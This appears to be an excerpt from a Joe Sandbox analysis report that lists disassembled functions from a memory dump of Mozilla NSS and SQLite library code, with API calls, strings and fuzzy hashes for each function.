Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CloseHandle$CriticalDeleteErrorLastSectionUnmapmemset
String ID:
API String ID: 447902086-0
Opcode ID: d145fa3fd6b89c117021063633591c639b50dc7bf2eeea8ab36fbcd82ab128c1
Instruction ID: 3ada9c6ea81d6dbbfd40e5a62b4d9b2922d07fb86fc062fc03e5fd4c7b73f6b2
Opcode Fuzzy Hash: d145fa3fd6b89c117021063633591c639b50dc7bf2eeea8ab36fbcd82ab128c1
Instruction Fuzzy Hash: 4C11DD72B41500EBDE329B98DE19B4A7735BBE231CF050838F90993A61D322BD15D7E2

Function 6C79CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C7B1E10: TlsGetValue.KERNEL32 ref: 6C7B1E36
Part of subcall function 6C7B1E10: EnterCriticalSection.KERNEL32(?,?,?,6C78B1EE,2404110F,?,?), ref: 6C7B1E4B
Part of subcall function 6C7B1E10: PR_Unlock.NSS3 ref: 6C7B1E76

free.MOZGLUE(?,6C79D079,00000000,00000001), ref: 6C79CDA5
PK11_FreeSymKey.NSS3(?,6C79D079,00000000,00000001), ref: 6C79CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C79D079,00000000,00000001), ref: 6C79CDCF
DeleteCriticalSection.KERNEL32(?,6C79D079,00000000,00000001), ref: 6C79CDE2
free.MOZGLUE(?), ref: 6C79CDE9

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: df330a5214dd9de1377e537f1438d28ea3609cf9d6ea71b2279b14f3fc0f5027
Instruction ID: bbc92ee1e613d4dd667bfbc419ee33e065efaa3d2c087ce8bc6c9813d87eacdb
Opcode Fuzzy Hash: df330a5214dd9de1377e537f1438d28ea3609cf9d6ea71b2279b14f3fc0f5027
Instruction Fuzzy Hash: D811A0B2B01111BBDE00AFA6EE4A996B72CBB0426E7140131E90997E12E732E524C7E1

Function 6C802CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C802CEC

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_EnterMonitor.NSS3(?), ref: 6C802D02
PR_EnterMonitor.NSS3(?), ref: 6C802D1F
PR_ExitMonitor.NSS3(?), ref: 6C802D42
PR_ExitMonitor.NSS3(?), ref: 6C802D5B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: b6c607bbba8aaafd5e1693985b6cc2ff6dad2d658c66d68afd8775c86833708b
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 0601C4B2B002046BE7309E29FD84BC7B7A5EF45319F005D35E85D86B20E676F819C792

Function 6C802D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C802D9C

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_EnterMonitor.NSS3(?), ref: 6C802DB2
PR_EnterMonitor.NSS3(?), ref: 6C802DCF
PR_ExitMonitor.NSS3(?), ref: 6C802DF2
PR_ExitMonitor.NSS3(?), ref: 6C802E0B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: c3b3bd7b89dcccfcaea4da1afae2022171ddbfd1397405df3118eae98dd2a4c3
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 5101C4B1B40204AFEB709E29FE45BC7B7A5EF41318F001D35E85D86B21D636F825C6A2

Function 6C79AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C783090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C79AE42), ref: 6C7830AA
Part of subcall function 6C783090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7830C7
Part of subcall function 6C783090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7830E5
Part of subcall function 6C783090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C783116
Part of subcall function 6C783090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78312B
Part of subcall function 6C783090: PK11_DestroyObject.NSS3(?,?), ref: 6C783154
Part of subcall function 6C783090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7799FF,?,?,?,?,?,?,?,?,?,6C772D6B,?), ref: 6C79AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7799FF,?,?,?,?,?,?,?,?,?,6C772D6B,?), ref: 6C79AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C772D6B,?,?,00000000), ref: 6C79AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C772D6B,?,?,00000000), ref: 6C79AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C772D6B,?,?), ref: 6C79AEA3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 537c58f296b11bdc250821259f5476fa67cee1e05161aa36e6c01e486e8f9be3
Instruction ID: 97eb7aa637d3059501de1e285e8f00009791954fff0f4a6bad9710d36e5ccbcf
Opcode Fuzzy Hash: 537c58f296b11bdc250821259f5476fa67cee1e05161aa36e6c01e486e8f9be3
Instruction Fuzzy Hash: EC01A466F065105BE701A26CBE9FAAF315C8B8766DF080031E909D7B01F615D90542E3

Function 6C8149C0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(000A2CD6,00000000,00000000,00000678,?,?,6C805F34,00000A20), ref: 6C8149EC

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

SECITEM_ZfreeItem_Util.NSS3(000A2CEA,00000000,6C805F34,00000A20,?,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C8149F9
SECITEM_ZfreeItem_Util.NSS3(000A2CBE,00000000,?,?,6C805F34,00000A20,?,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C814A06
free.MOZGLUE(?,?,?,?,?,6C805F34,00000A20), ref: 6C814A16
free.MOZGLUE(000A2CB6,?,?,?,?,6C805F34,00000A20), ref: 6C814A1C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID:
API String ID: 2193358613-0
Opcode ID: 44129a97a2b25e257021d3a82688acb59936cfeb9506fa8835f05af89d113e90
Instruction ID: 2b208a30919863e9945e8cf084d3f2a37e4ee52ee6126509728a047060d67cc9
Opcode Fuzzy Hash: 44129a97a2b25e257021d3a82688acb59936cfeb9506fa8835f05af89d113e90
Instruction Fuzzy Hash: 1C015EB6A001059FCB00CF69DDC8C967BFCEF8A2483058475E909CB702E731E904CBA1

Function 6C880930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6C880C83), ref: 6C88094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C880C83), ref: 6C880974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880983
_PR_MD_UNLOCK.NSS3(?,?,6C880C83), ref: 6C88099F
OutputDebugStringA.KERNEL32(?,?,6C880C83), ref: 6C8809B2

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: 3dbe0a9d78da03c1fc1a40d36d5fa85445cd53fcc7a184a28136ff7b04480a67
Instruction ID: 4d98eaf4bf7f885643c955029ab7bd99e80f5f5fcb35e662804229ac45f70add
Opcode Fuzzy Hash: 3dbe0a9d78da03c1fc1a40d36d5fa85445cd53fcc7a184a28136ff7b04480a67
Instruction Fuzzy Hash: DD0109B47061409FDF20AFA8ED85B593BB8AF4632DF1C0525F44582652D735F850CB91

Function 6C882A40 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C882A5B
free.MOZGLUE(?), ref: 6C882A6D
strdup.MOZGLUE(?), ref: 6C882A7B
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C882A96
PR_ExitMonitor.NSS3 ref: 6C882AB5

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterErrorExitfreestrdup
String ID:
API String ID: 1948362043-0
Opcode ID: 40b4e1770889d3073840b97c36bae7da6de690c9f9ddc7d314405372cf7fcd8f
Instruction ID: cc9daf8300cc7ac568e38de50bbb544af53d35f2e82aa480e87f2b8952e75049
Opcode Fuzzy Hash: 40b4e1770889d3073840b97c36bae7da6de690c9f9ddc7d314405372cf7fcd8f
Instruction Fuzzy Hash: D4F081B5E011245BDA30ABA5AE097467674AF0269CF090570E80A96E01E729ED18C7D2

Function 6C88ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C88A6D8), ref: 6C88AE0D
free.MOZGLUE(?), ref: 6C88AE14
DeleteCriticalSection.KERNEL32(6C88A6D8), ref: 6C88AE36
free.MOZGLUE(?), ref: 6C88AE3D
free.MOZGLUE(00000000,00000000,?,?,6C88A6D8), ref: 6C88AE47

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: a222ef9d118d8f3248e84cc0865f027490d2d4004a60f405eeec9f25a86da133
Instruction ID: a86d9bbf5da0ece2773cd7fb5bc97cf6fee9b240e77b4f1554f81354f60a59d7
Opcode Fuzzy Hash: a222ef9d118d8f3248e84cc0865f027490d2d4004a60f405eeec9f25a86da133
Instruction Fuzzy Hash: 0BF096B5202A01A7CA209FA9D80C9577778BF867797140738F52A83D81D732E216C7D5

Function 6C842B20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00020C24,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C842B64

Strings

misuse, xrefs: 6C842B58
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C842B4E
%s at line %d of [%.10s], xrefs: 6C842B5D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 632333372-648709467
Opcode ID: 5d4a93421900692c7dd97c7f5d32e4ae38175907f39f7445c6b680b67ffe4347
Instruction ID: f5e5162ce1cafa0570726773600a5eed829eb8b6204e868759820a1779e3c495
Opcode Fuzzy Hash: 5d4a93421900692c7dd97c7f5d32e4ae38175907f39f7445c6b680b67ffe4347
Instruction Fuzzy Hash: A2511870B0820E9BDB24CF6889897EEB7E2AF85308F158939C819D7B41D739D945C791

Function 6C7088D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C708990

Strings

@zql, xrefs: 6C708A31

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset
String ID: @zql
API String ID: 2221118986-2434142051
Opcode ID: ad0b216fe599c3d8fb5b1776485f1d688763e57002732b1335b39bd3ee6c090f
Instruction ID: dcdd81e8bc72e24ce68a9a06ccf047340ba9daf67f450b87d88ab0a46a05c984
Opcode Fuzzy Hash: ad0b216fe599c3d8fb5b1776485f1d688763e57002732b1335b39bd3ee6c090f
Instruction Fuzzy Hash: 8251F4B1A05B819FC704CF69C5946A6BBF0BF59308B24969EC8884BB43D331F596CBD1

Function 6C704AC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000B2F5), ref: 6C704C2B

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C704C24
winWrite1, xrefs: 6C704BC2
winWrite2, xrefs: 6C704C01

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
API String ID: 632333372-1808655853
Opcode ID: dba8b5f7ebaf1818ea71390fec186466e23c4d2d58aa2d0feb5973c40986834d
Instruction ID: 55b520401a9217a6176be766f2c2c1ad0cc316e6c0057b9f11884ff6a0c6c8ec
Opcode Fuzzy Hash: dba8b5f7ebaf1818ea71390fec186466e23c4d2d58aa2d0feb5973c40986834d
Instruction Fuzzy Hash: 8D41B0727043059BD714CF19C945A5AB7E9BFD5318F108A3DF85887790E730D904CB92

Function 6C706C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C706D36

Strings

database corruption, xrefs: 6C706D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C706D20
%s at line %d of [%.10s], xrefs: 6C706D2F

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 70b0bc8fe8e60c83bcb05cf818194944171cb1d365ed477bdccdf25cc2656730
Instruction ID: ff32eb4a1e2327ede9b31c73ce4a16f71c40f7833a36715ba4bd5d23c4400f42
Opcode Fuzzy Hash: 70b0bc8fe8e60c83bcb05cf818194944171cb1d365ed477bdccdf25cc2656730
Instruction Fuzzy Hash: D02102B07003059BCB10CE19CA52B5AB7F2AF81308F144928DC59DBF51E370FA85C792

Function 6C846B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

sqlite3_snprintf.NSS3(?,6C846AC0,6C8AAAF9,00000000,?,6C846AC0,?), ref: 6C846BA9
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C846AC0,?), ref: 6C846BB2
sqlite3_snprintf.NSS3(?,6C846AC0,OsError 0x%lx (%lu),00000000,00000000,?,6C846AC0,?), ref: 6C846BD9

Strings

OsError 0x%lx (%lu), xrefs: 6C846BCE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_snprintf$sqlite3_free
String ID: OsError 0x%lx (%lu)
API String ID: 2089385377-3720535092
Opcode ID: e23691b5479f38d96d7bd0aa19bfb15a2f6c360254cab09d35c980dae7ce3c37
Instruction ID: c054a2e4cdc89cc179584bb7d80beab6f75dac1dea2d841f510dd334c2d216e8
Opcode Fuzzy Hash: e23691b5479f38d96d7bd0aa19bfb15a2f6c360254cab09d35c980dae7ce3c37
Instruction Fuzzy Hash: E8119075A00109ABDB289FA5ED89DAF7B79EF86759700443CF50993A41DB206D04CBE1

Function 6C7E2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+~l,6C7E32C2,<+~l,00000000,00000000,?), ref: 6C7E2FDA

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7E300B

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7E302A

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

Part of subcall function 6C7BC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C7BC45D
Part of subcall function 6C7BC3D0: TlsGetValue.KERNEL32 ref: 6C7BC494
Part of subcall function 6C7BC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C7BC4A9
Part of subcall function 6C7BC3D0: PR_Unlock.NSS3(?), ref: 6C7BC4F4

Strings

<+~l, xrefs: 6C7E2FD0

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
